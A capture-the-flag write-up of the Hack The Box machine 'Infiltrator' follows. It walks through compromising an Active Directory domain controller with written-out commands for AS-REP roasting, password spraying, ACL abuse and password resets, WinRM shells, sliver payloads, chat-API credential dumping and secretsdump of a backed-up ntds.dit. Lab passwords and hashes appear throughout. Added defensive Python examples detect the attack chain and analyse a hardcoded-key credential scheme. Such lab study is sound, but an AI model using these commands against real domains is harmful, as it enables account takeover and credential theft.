PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Infiltrator.htb
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-21 15:15:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-21T15:17:16+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-21T15:17:15+00:00; -1s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-21T15:17:16+00:00; 0s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after: 2099-07-17T18:48:15
|_ssl-date: 2024-10-21T15:17:15+00:00; -1s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Not valid before: 2024-07-30T13:20:17
|_Not valid after: 2025-01-29T13:20:17
|_ssl-date: 2024-10-21T15:17:15+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: INFILTRATOR
| NetBIOS_Domain_Name: INFILTRATOR
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: infiltrator.htb
| DNS_Computer_Name: dc01.infiltrator.htb
| DNS_Tree_Name: infiltrator.htb
| Product_Version: 10.0.17763
|_ System_Time: 2024-10-21T15:16:36+00:00
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49729/tcp open msrpc Microsoft Windows RPC
49759/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-21T15:16:38
|_ start_date: N/A
Based on the open ports and the returned data, I'm dealing with a Domain Controller. It exposes the hostname dc01.infiltrator.htb along with the domain infiltrator.htb, so I'll add both to my /etc/hosts file.
HTTP
The webpage is about a digital marketing campaign and showcases what they provide to customers. There's a search and a contact form, but neither seems to be functional. Near the end of the page the members of the team are introduced.
To build a list of potential users, I’ll scrape the 7 names and add them to a file called names.txt.
names.txt
David Anderson
Olivia Martinez
Kevin Turner
Amanda Walker
Marcus Harris
Lauren Clark
Ethan Rodriguez
Next I’ll run username-anarchy on the names to generate a long list with combinations of the provided names.
$ ./username-anarchy --input-file ../names.txt > ../usernames.txt
$ head -n 10 ../usernames.txt
david
davidanderson
david.anderson
davidand
daviande
davida
d.anderson
danderson
adavid
a.david
Kerberos
I supply the generated list to kerbrute and check for valid usernames. Apparently the username format in the domain is the first letter of the first name, followed by a dot and the last name. I'll add those 7 valid names to another list to keep track of the valid accounts.
Next I feed the valid users into GetNPUsers from impacket to check whether any of them do not require Kerberos pre-authentication. l.clark turns out to be such an account, and I can proceed to crack the returned AS-REP hash to retrieve the password.
impacket-GetNPUsers -usersfile users.txt \
    -format hashcat \
    -outputfile hash \
    -dc-host dc01.infiltrator.htb \
    INFILTRATOR.HTB/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] User d.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.martinez doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.turner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User e.rodriguez doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@INFILTRATOR.HTB:1a250f7ba95f791d3a3f12386842b8c0$b16cbb0e7afc669ab2c33ecd7196b546b795d4e0a846e962b48f59f43402956445e8dc9dfc0683f245556fad51982836ca24172e179cf8f208b10d5cb3235b46e1cb82d01f5093c9588a03e39fae53f4be50e684cce2b83efa1da9e88436d86c492634c897d61924429e7a4d64efe24d17b8dd01cefc758f8302c858d821407ce54953326d6e97e964141670eda4d68ee67b40f0e05cc56235fd8b82d7d3d0dac4d990ee5555ff7fbf374971b219aa8c411dff9ac0b096cf52deceef544f086407b4fb90113f1580c3b2ebfccc488bc3e0eb4176f9eeab4de352ba56c36a219f183edafbf94bc8ca9e37641b5c44166d4fe5
hashcat takes a few moments and is able to crack the password with rockyou.txt and returns WAT?watismypass!.
With the newly obtained credentials I list all local users on the Domain Controller with nxc. By default it also lists the description of the accounts, where passwords are sometimes stored. This comes back with 12 accounts and the password MessengerApp@Pass! in the description of k.turner.
I add both passwords to a file and then check for password reuse. It does look like multiple accounts might share the same password but are not allowed to log in (STATUS_ACCOUNT_RESTRICTION)[1].
Maybe those users can only log in via Kerberos, so I'll use the user and password lists for a password spray with kerbrute. This finds valid credentials for d.anderson.
Feeding generated data into BloodHound shows an interesting path from d.anderson to m.harris.
1. Abuse GenericAll to apply an Access Control Entry (ACE) that all objects in the Marketing Digital group inherit
2. GenericAll on e.rodriguez and take over the account
3. Add oneself to the Chiefs Marketing group
4. Reset the password for m.harris
I begin the path by requesting a new TGT for d.anderson and export it via the KRB5CCNAME environment variable so it is used for authentication. Then I use dacledit to apply a new ACE granting FullControl over the object with the distinguished name OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB (visible in BloodHound).
impacket-getTGT -dc-ip dc01.infiltrator.htb 'INFILTRATOR.HTB/d.anderson:WAT?watismypass!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in d.anderson.ccache

export KRB5CCNAME=d.anderson.ccache

impacket-dacledit -action 'write' \
    -rights 'FullControl' \
    -inheritance \
    -principal 'd.anderson' \
    -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' \
    -dc-ip dc01.infiltrator.htb \
    -k \
    -no-pass \
    'INFILTRATOR.HTB/d.anderson'
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20241021-191805.bak
[*] DACL modified successfully!
Next I proceed to reset the password for user e.rodriguez.
impacket-changepasswd -k \
    -no-pass \
    -dc-ip dc01.infiltrator.htb \
    -altuser INFILTRATOR.HTB/d.anderson \
    -altpass 'WAT?watismypass!' \
    -newpass 'Helloworld123!' \
    -reset \
    'INFILTRATOR.HTB/e.rodriguez@dc01.infiltrator.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Setting the password of INFILTRATOR.HTB\e.rodriguez as INFILTRATOR.HTB\d.anderson
[*] Connecting to DCE/RPC as INFILTRATOR.HTB\d.anderson
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
I request another TGT as e.rodriguez and then add that user to the Chiefs Marketing group with bloodyAD. Before resetting the password of m.harris I need to renew my TGT so that the new group membership is reflected in the ticket.
impacket-getTGT -dc-ip dc01.infiltrator.htb 'INFILTRATOR.HTB/e.rodriguez:Helloworld123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in e.rodriguez.ccache

export KRB5CCNAME=e.rodriguez.ccache

bloodyAD -d INFILTRATOR.HTB \
    -k \
    --host dc01.infiltrator.htb \
    add groupMember 'Chiefs Marketing' 'e.rodriguez'
[+] e.rodriguez added to Chiefs Marketing

impacket-getTGT -dc-ip dc01.infiltrator.htb 'INFILTRATOR.HTB/e.rodriguez:Helloworld123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in e.rodriguez.ccache

bloodyAD -d INFILTRATOR.HTB \
    -k \
    --host dc01.infiltrator.htb \
    set password 'm.harris' 'Helloworld123!'
Finally I request another TGT, this time as m.harris, and set the environment variable accordingly. Then I use evil-winrm to get a shell on the system and read the first flag.
impacket-getTGT -dc-ip dc01.infiltrator.htb infiltrator.htb/m.harris:'Helloworld123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in m.harris.ccache

export KRB5CCNAME=m.harris.ccache

evil-winrm -i dc01.infiltrator.htb -r infiltrator.htb
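From the blue-team side, every step of the path just walked, from the AS-REP roast of l.clark up to the password reset of m.harris, leaves a distinct record in the domain controller's Security log. The following Python script is an added example (not part of the write-up and not any tool's code) that reconstructs both from such records: event 4768 with pre-authentication type 0 and RC4 encryption for the roastable account, and the sequence 5136 (nTSecurityDescriptor written) ⇒ 4724 (password reset) ⇒ 4728 (self added to group) ⇒ 4724 for the ACL-abuse chain. The event records and the source IP addresses are constructed to mirror the EventData field names of those event IDs; they are not log data from the box.

```python
"""Flag AS-REP roasting and a DACL-write -> password-reset -> group-add
takeover chain in Windows Security events (added example, constructed data)."""
from collections import defaultdict

GROUP_ADD_EVENTS = {4728, 4732, 4756}   # member added to global / local / universal group

# Constructed sample events, field names as in the Security event EventData.
SAMPLE_EVENTS = [
    # 4768 = TGT requested. PreAuthType 0 = no pre-authentication,
    # TicketEncryptionType 0x17 = RC4-HMAC: the crackable AS-REP GetNPUsers asks for.
    {"EventID": 4768, "TargetUserName": "l.clark", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    # A normal logon: PA-ENC-TIMESTAMP (2) and AES256 (0x12).
    {"EventID": 4768, "TargetUserName": "m.harris", "IpAddress": "10.10.10.20",
     "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    # 5136 = directory object modified: the dacledit write of nTSecurityDescriptor on the OU.
    {"EventID": 5136, "SubjectUserName": "d.anderson",
     "ObjectDN": "OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    # 4724 = password reset attempted on another account (changepasswd -reset).
    {"EventID": 4724, "SubjectUserName": "d.anderson", "TargetUserName": "e.rodriguez"},
    # 4728 = member added to a security-enabled global group (bloodyAD add groupMember).
    {"EventID": 4728, "SubjectUserName": "e.rodriguez", "TargetUserName": "Chiefs Marketing",
     "MemberName": "CN=e.rodriguez,OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB"},
    {"EventID": 4724, "SubjectUserName": "e.rodriguez", "TargetUserName": "m.harris"},
]


def asrep_roast_candidates(events):
    """Accounts whose TGT was issued without pre-auth and with RC4: each such
    4768 carries an AS-REP that is crackable offline. Returns (user, source IP)."""
    return [(e["TargetUserName"], e.get("IpAddress", "?")) for e in events
            if e["EventID"] == 4768 and e.get("PreAuthType") == "0"
            and e.get("TicketEncryptionType", "").lower() == "0x17"]


def dacl_writers(events):
    """Actors that modified nTSecurityDescriptor on any object. 5136 only fires
    when 'Audit Directory Service Changes' is on and the object carries a SACL."""
    return {e["SubjectUserName"] for e in events
            if e["EventID"] == 5136 and e.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"}


def password_resets(events):
    """actor -> accounts whose password that actor reset, in log order (4724)."""
    resets = defaultdict(list)
    for e in events:
        if e["EventID"] == 4724:
            resets[e["SubjectUserName"]].append(e["TargetUserName"])
    return resets


def self_group_adds(events):
    """actor -> group, for group-add events where the member is the actor's own account."""
    return {e["SubjectUserName"]: e["TargetUserName"] for e in events
            if e["EventID"] in GROUP_ADD_EVENTS
            and e["SubjectUserName"].lower() in e.get("MemberName", "").lower()}


def takeover_chains(events):
    """From each DACL writer, follow 'A reset B's password, B reset C's ...'
    to reconstruct the account-takeover path as a list of account names."""
    resets = password_resets(events)
    chains = []
    for start in sorted(dacl_writers(events)):
        chain, seen = [start], {start}
        while resets.get(chain[-1]):
            nxt = resets[chain[-1]][0]
            if nxt in seen:
                break
            chain.append(nxt)
            seen.add(nxt)
        if len(chain) > 1:
            chains.append(chain)
    return chains


if __name__ == "__main__":
    print("AS-REP roast candidates:", asrep_roast_candidates(SAMPLE_EVENTS))
    print("self group adds:", self_group_adds(SAMPLE_EVENTS))
    print("takeover chains:", takeover_chains(SAMPLE_EVENTS))
```

Run against the constructed events this reports l.clark as the roastable account and the chain d.anderson ⇒ e.rodriguez ⇒ m.harris. Two caveats a real deployment needs: 5136 requires the directory-changes audit subcategory plus a SACL on the OU, otherwise the first link of the chain is invisible, and a 4724 performed by a help-desk account is normal, so the chain logic keys on a DACL write by a non-admin as the starting point rather than on resets alone.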
Info
To use evil-winrm with Kerberos authentication, the package krb5-user has to be installed.
The file /etc/krb5.conf should also have the following content:
For some reason the session with evil-winrm is very unstable, so I switch over to sliver.
Looking around on the system I find an installation of Output Messenger Server and remember that I've already found credentials in an LDAP description that might work there. To interact with the application I install the client and forward a few ports[2].
Apparently the application needs ports 14118 to 14130, so I'll forward those with chisel. Then I start Output Messenger and log in with the credentials k.turner:MessengerApp@Pass!, specifying 127.0.0.1 as the server.
Besides the ability to read the chat rooms and start personal chats, there's also the Wall with posts about the missing pre-authentication and the UserExplorer app project. The sample usage shows the password D3v3l0p3r_Pass@1337! for user m.harris.
Next I log out (or rather kill the app, because the button does not work…) and log in as m.harris with the password I just found. The group chats are exactly the same, but there's a personal chat with Admin in which a version of UserExplorer.exe was sent to m.harris.
After setting the output directory in the messenger's settings, I can download the file from the chat. Examining it with file shows that it's a .NET assembly. I move the binary to my Windows VM and load it into dnSpy.
The code is fairly simple and resembles an LDAP lookup tool. It contains hardcoded credentials for the user winrm_svc, although they are AES-encrypted.
private static void Main(string[] args)
{
    string path = "LDAP://dc01.infiltrator.htb";
    string text = "";
    string text2 = "";
    string text3 = "";
    string text4 = "winrm_svc";
    string cipherText = "TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=";
    int i = 0;
    while (i < args.Length)
    {
        string text5 = args[i].ToLower();
        if (text5 != null)
        {
            if (!(text5 == "-u"))
            {
                if (!(text5 == "-p"))
                {
                    if (!(text5 == "-s"))
                    {
                        if (!(text5 == "-default"))
                        {
                            goto IL_C2;
                        }
                        // -default: use the embedded winrm_svc account and decrypt its password
                        text = text4;
                        text2 = Decryptor.DecryptString("b14ca5898a4e4133bbce2ea2315a1916", cipherText);
                    }
                    else
                    {
                        text3 = args[i + 1];
                    }
                }
                else
                {
                    text2 = args[i + 1];
                }
            }
            else
            {
                text = args[i + 1];
            }
            i += 2;
            continue;
        }
        IL_C2:
        Console.WriteLine(string.Format("Invalid argument: {0}", args[i]));
        return;
It passes the ciphertext TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE= and the key b14ca5898a4e4133bbce2ea2315a1916 to the DecryptString() function in another part of the application. There a new AES decryptor is initialised with the IV set to 16 null bytes and then used to decrypt the base64-decoded ciphertext.
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

// Token: 0x02000002 RID: 2
public class Decryptor
{
    // Token: 0x06000002 RID: 2 RVA: 0x00002058 File Offset: 0x00000258
    public static string DecryptString(string key, string cipherText)
    {
        string result;
        using (Aes aes = Aes.Create())
        {
            aes.Key = Encoding.UTF8.GetBytes(key);   // 32-character key string -> AES-256 key
            aes.IV = new byte[16];                    // IV is 16 zero bytes
            ICryptoTransform cryptoTransform = aes.CreateDecryptor(aes.Key, aes.IV);
            using (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(cipherText)))
            {
                using (CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform, 0))
                {
                    using (StreamReader streamReader = new StreamReader(cryptoStream))
                    {
                        result = streamReader.ReadToEnd();
                    }
                }
            }
        }
        return result;
    }
}
Replicating the steps in CyberChef returns another base64-encoded string. Repeating the same steps on that returns the plaintext password WinRm@$svc^!^P. Once again I change the user in the chat application.
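The decrypt routine above is worth understanding as a pattern, because it recurs in many internal tools: a credential "protected" with AES whose key sits in the same binary is only obfuscated, and the zero IV makes the scheme deterministic on top. The following Python is an added example, not the binary's code and not the write-up's, that re-implements the scheme (AES-CBC, PKCS#7 padding, key = UTF-8 bytes of the key string, zero IV, base64 transport, and a second base64 layer around the secret, hence the two rounds in CyberChef) so the behaviour can be checked offline. KEY and SECRET are constructed for the demo, not the values recovered from UserExplorer.exe; the cryptography package is assumed to be installed.

```python
"""Re-implementation of the DecryptString() scheme for analysis (added
example). Key, IV handling and padding mirror the decompiled .NET code;
the key and secret used here are constructed."""
import base64
import os

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

ZERO_IV = bytes(16)                       # what `new byte[16]` yields in .NET
KEY = "0123456789abcdef0123456789abcdef"  # constructed: 32 chars -> 32-byte AES-256 key
SECRET = "Example-Secret-1!"              # constructed stand-in for the real password


def decrypt_string(key: str, cipher_text_b64: str, iv: bytes = ZERO_IV) -> str:
    """Mirror of Decryptor.DecryptString(): Aes.Create() defaults to CBC + PKCS7."""
    decryptor = Cipher(algorithms.AES(key.encode("utf-8")), modes.CBC(iv)).decryptor()
    padded = decryptor.update(base64.b64decode(cipher_text_b64)) + decryptor.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return (unpadder.update(padded) + unpadder.finalize()).decode("utf-8")


def encrypt_string(key: str, plaintext: str, iv: bytes = ZERO_IV) -> str:
    """Inverse of decrypt_string(), so the example needs no external ciphertext."""
    padder = padding.PKCS7(128).padder()
    padded = padder.update(plaintext.encode("utf-8")) + padder.finalize()
    encryptor = Cipher(algorithms.AES(key.encode("utf-8")), modes.CBC(iv)).encryptor()
    return base64.b64encode(encryptor.update(padded) + encryptor.finalize()).decode("ascii")


def unwrap_double_base64(key: str, outer_b64: str) -> str:
    """The stored value is base64(secret), AES-encrypted, then base64 again:
    one decrypt yields a base64 string, decoding that yields the secret."""
    inner = decrypt_string(key, outer_b64)
    return base64.b64decode(inner).decode("utf-8")


# What such a binary ships: base64(secret) -> AES-CBC(zero IV) -> base64.
SAMPLE_OUTER = encrypt_string(KEY, base64.b64encode(SECRET.encode("utf-8")).decode("ascii"))


def fixed_iv_is_deterministic(key: str, plaintext: str) -> bool:
    """With a fixed (zero) IV the same secret always encrypts to the same
    bytes, so equal secrets are recognisable even without the key."""
    return encrypt_string(key, plaintext) == encrypt_string(key, plaintext)


def random_iv_differs(key: str, plaintext: str) -> bool:
    """With a fresh random IV per encryption the ciphertexts differ."""
    return (encrypt_string(key, plaintext, os.urandom(16))
            != encrypt_string(key, plaintext, os.urandom(16)))


if __name__ == "__main__":
    print("recovered secret:", unwrap_double_base64(KEY, SAMPLE_OUTER))
    print("zero IV deterministic:", fixed_iv_is_deterministic(KEY, SECRET))
```

The two boolean helpers make the design point: a random per-message IV fixes determinism, but no IV choice fixes the real defect, which is that the key is a string constant next to the ciphertext. A credential the tool needs at runtime belongs in a store the binary does not contain (a gMSA, DPAPI-protected storage, or a secret injected at deployment), not in the assembly.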
Access as o.martinez
As winrm_svc I have access to a personal chat with o.martinez, in which she talks about suspicious behaviour on her account. She mentions that she only shared the password in the Chief Marketing chat. Unfortunately none of the accounts I currently have credentials for has access to this chat room. As I already did with the other accounts, I check whether there is any additional information on the wall, the calendar and the notes. At first there's nothing, but right-clicking and choosing Sync Notes makes one note called app management appear, containing the API key 558R501T5I6024Y8JV3B7KOUN1A518GG.
The API of the Output Messenger Server requires the key in a custom HTTP header API-KEY and offers REST endpoints for users, groups, rooms and notifications[3]. Even though I can list the available rooms and see that A.walker also has access to the chat room, I cannot read the logs because I'm missing the roomkey parameter. Modifying the room or users does not work either, probably because the permissions of the API key are too restrictive.
Since the user winrm_svc, as the name suggests, can use evil-winrm to get an interactive shell, I run my sliver payload through that. Then I check locally for any interesting artifacts concerning Output Messenger, since the Linux client, albeit official, felt very unstable, so possibly things just didn't work properly.
In C:\users\winrm_svc\appdata\roaming\Output Messenger\JAAA I find two SQLite3 databases and transfer them to my host. Looking through OM.db3 I find references to the Chiefs_Marketing_chat, including something that looks like a roomkey: 20240220014618@conference.com.
Trying out the roomkey with a very wide date range, I'm able to dump the logs of the chat room, and they do in fact contain the password m@rtinez@1996!.
curl -s -H 'API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG' 'http://127.0.0.1:14125/api/chatrooms/logs?roomkey=20240220014618@conference.com&fromdate=2000/01/01&todate=2030/01/01' | jq .
{
  "success": true,
  "logs": "<REMOVED CSS><div class='room_log'><div class='logdateorange'>20/02/2024</div><div class='datebox'> <span class='datefont'>20<br></span><span class='monthfont'>Feb</span></div><br><br><div id='greybk'><div class='logfromName'><img src='/temp/hash_dark_20.png' class='middle' title='' /> Chiefs_Marketing_chat: A.walker, O.martinez</div></div><br><div id='greybk'><span class='nickname' >A.walker Says: </span><div class='msg_time'>02:05 AM</div><br /><div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div><div class='msg_body' >Hey, hope you're doing well! What tasks do you have on your plate today?</div><br /></div><div id='greybk'><span class='nickname' >O.martinez Says: </span><div class='msg_time'>02:06 AM</div><br /><div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div><div class='msg_body' >Thanks! I'm working on the new marketing campaign and reviewing the budget for Q4. How about you?</div><br /></div><div id='greybk'><span class='nickname' >A.walker Says: </span><div class='msg_time'>02:08 AM</div><br /><div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div><div class='msg_body' >Sounds busy! By the way, I need to check something in your account. Could you share your username password?</div><br /></div><div id='greybk'><span class='nickname' >O.martinez Says: </span><div class='msg_time'>02:09 AM</div><br /><div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div><div class='msg_body' >sure!</div><br /></div><div id='greybk'><span class='nickname' >O.martinez Says: </span><div class='msg_time'>02:09 AM</div><br /><div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div><div class='msg_body' >O.martinez : m@rtinez@1996!</div><br /></div></div>"
}
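The log endpoint hands back rendered HTML rather than structured messages, which is awkward for anyone wanting to review room history for exactly the kind of exchange above (one user asking for a password, the other pasting it). The Python below is an added example, not part of the write-up and not Output Messenger's code, that parses that markup into (sender, message) pairs and flags a credential handed over in reply to a request for one. SAMPLE_LOG is constructed to match the markup structure of the curl output above; the shared secret in it is a placeholder, not the real password.

```python
"""Parse Output Messenger room-log HTML and flag password hand-overs
(added example; sample markup and secret are constructed)."""
import json
import re
from html.parser import HTMLParser

# Constructed room log with the same element structure as the API output above.
_MESSAGES = [
    ("A.walker", "02:05 AM", "Hey, hope you're doing well! What tasks do you have on your plate today?"),
    ("O.martinez", "02:06 AM", "Thanks! I'm working on the new marketing campaign and reviewing the budget for Q4. How about you?"),
    ("A.walker", "02:08 AM", "Sounds busy! By the way, I need to check something in your account. Could you share your username password?"),
    ("O.martinez", "02:09 AM", "sure!"),
    ("O.martinez", "02:09 AM", "O.martinez : s3cret-PLACEHOLDER!"),   # placeholder, not the real value
]
SAMPLE_LOG = (
    "<div class='room_log'><div class='logdateorange'>20/02/2024</div>"
    "<div id='greybk'><div class='logfromName'><img src='/temp/hash_dark_20.png' class='middle' title='' />"
    " Chiefs_Marketing_chat: A.walker, O.martinez</div></div><br>"
    + "".join(
        f"<div id='greybk'><span class='nickname' >{who} Says: </span><div class='msg_time'>{when}</div><br />"
        "<div class='bullet'><img src='/Temp/bullets.png' class='read' title='' /></div>"
        f"<div class='msg_body' >{text}</div><br /></div>"
        for who, when, text in _MESSAGES)
    + "</div>"
)
SAMPLE_RESPONSE = json.dumps({"success": True, "logs": SAMPLE_LOG})   # constructed API reply


class RoomLogParser(HTMLParser):
    """Collect span.nickname / div.msg_body pairs in document order."""

    def __init__(self):
        super().__init__()
        self.messages = []      # list of (sender, body)
        self._sender = None
        self._in_nick = self._in_body = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        cls = dict(attrs).get("class", "")
        if tag == "span" and cls == "nickname":
            self._in_nick, self._buf = True, []
        elif tag == "div" and cls == "msg_body":
            self._in_body, self._buf = True, []

    def handle_data(self, data):
        if self._in_nick or self._in_body:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "span" and self._in_nick:
            self._in_nick = False
            self._sender = "".join(self._buf).replace("Says:", "").strip()
        elif tag == "div" and self._in_body:
            self._in_body = False
            self.messages.append((self._sender, "".join(self._buf).strip()))


def parse_room_log(html):
    parser = RoomLogParser()
    parser.feed(html)
    parser.close()
    return parser.messages


def messages_from_api_response(payload):
    """Unwrap the JSON envelope {'success': ..., 'logs': '<html>'} first."""
    return parse_room_log(json.loads(payload)["logs"])


ASKS_FOR_PASSWORD = re.compile(r"(?i)\b(password|passwd|credentials?)\b")
# a whitespace-delimited token of 8+ chars containing a digit and a symbol
PASSWORD_LIKE = re.compile(r"(?<!\S)(?=\S{8,})(?=\S*\d)(?=\S*[!@#$%^&*?_\-])\S+")


def find_credential_disclosures(messages, window=3):
    """Return (discloser, token, requester) where someone other than the
    requester posts a password-like token within `window` messages of a
    message that asks for a password."""
    findings = []
    for i, (requester, body) in enumerate(messages):
        if not ASKS_FOR_PASSWORD.search(body):
            continue
        for sender, reply in messages[i + 1:i + 1 + window]:
            if sender == requester:
                continue
            match = PASSWORD_LIKE.search(reply)
            if match:
                findings.append((sender, match.group(0), requester))
                break
    return findings


if __name__ == "__main__":
    for finding in find_credential_disclosures(messages_from_api_response(SAMPLE_RESPONSE)):
        print("credential shared in chat:", finding)
```

The request/reply pairing is what keeps the false-positive rate tolerable: a lone token with digits and symbols (a ticket number, a hostname) is not flagged unless it follows a message asking for a password from someone else. Tuning PASSWORD_LIKE to the organisation's password policy is the obvious next step.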
Once again I repeat the logout/kill and login procedure with the new credentials. Now I have access as o.martinez and see the previously dumped chat.
I had already noticed that this account's status was set to idle, and viewing the profile confirms that there's another session active on the Domain Controller.
According to the documentation it should be possible to run applications at specific times with the Reminder feature, but this seems not to be implemented on Linux, so I install the application in my Windows VM. There I can create a new calendar entry that runs my sliver payload, which I previously put in C:\temp\m.exe.
For good measure I refresh and sync the calendars (right-click), and eventually there's a callback with a new session as o.martinez. Based on the previous experience I check for additional data in C:\users\o.martinez\appdata\roaming\output messenger\faaa and find one received file, a packet capture called network_capture_2024.pcapng.
Examining the packet capture in Wireshark shows network traffic with a web server. Filtering for HTTP traffic only limits the view to a login, followed by a file listing and a download of Bitlocker-backup.7z. Then the authentication token is changed with a POST to /api/change_auth_token. Inspecting the details of this packet reveals the new token to be M@rtinez_P@ssw0rd!, and checking this password for o.martinez returns success.
Furthermore I extract the 7z file from the capture via File⇒Export Objects⇒HTTP. A new window opens where I can choose the object to save; I pick the line with content type application/octet-stream and save it to disk.
Given the sensitive nature of the file, judging by its name, it is password-protected. None of the previously found passwords work, so I extract the hash with 7z2john and try to crack it with john.
7z2john BitLocker-backup.7z > 7z_hash
ATTENTION: the hashes might contain sensitive encrypted data. Be careful when sharing or posting these hashes

john --fork=10 --wordlist=/usr/share/wordlists/rockyou.txt 7z_hash
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 8 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 209048 for all loaded hashes
Node numbers 1-10 of 10 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
zipper           (BitLocker-backup.7z)
--- SNIP ---
It takes a bit of time, but the password zipper is found, letting me extract the archive. It contains just a single HTML file, which holds the BitLocker Recovery Key.
Trying my luck with RDP and the credentials for o.martinez works. I'm able to log in, and there's a locked disk mounted at E:.
Access as lan_managment
Double-clicking the encrypted disk, I'm prompted to enter the password, but there's also the option to provide the backup key. Doing that unlocks the disk and gives me access to E:\Windows Server 2012 R2 - Backups.
Enumerating the backups, I eventually find Backup_Credentials.7z on the desktop of Administrator and transfer the file via the directory mounted in the RDP session.
This time the archive is not password-protected and extracts right away. It contains the ntds.dit and a backup of the registry hives SECURITY and SYSTEM, which is enough to run secretsdump and get all password hashes from the domain backup.
tree
.
├── Active Directory
│   └── ntds.dit
├── Backup_Credentials.7z
└── registry
    ├── SECURITY
    └── SYSTEM

3 directories, 4 files

impacket-secretsdump -security registry/SECURITY \
    -system registry/SYSTEM \
    -ntds Active\ Directory/ntds.dit \
    local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xd7e7d8797c1ccd58d95e4fb25cb7bdd4
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
